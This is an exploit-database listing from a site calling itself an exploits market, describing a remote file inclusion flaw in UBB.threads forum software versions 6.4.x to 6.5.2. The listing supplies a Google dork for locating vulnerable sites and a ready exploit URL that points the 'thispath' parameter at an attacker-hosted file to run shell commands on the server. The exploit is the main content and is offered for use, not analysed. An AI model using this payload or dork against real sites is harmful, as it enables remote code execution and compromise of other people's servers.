[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability

Author
V4mu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-436
Category
web applications
Date add
21-05-2006
Platform
unsorted
======================================================================
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
======================================================================



Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS



#  0day.today [2024-12-24]  #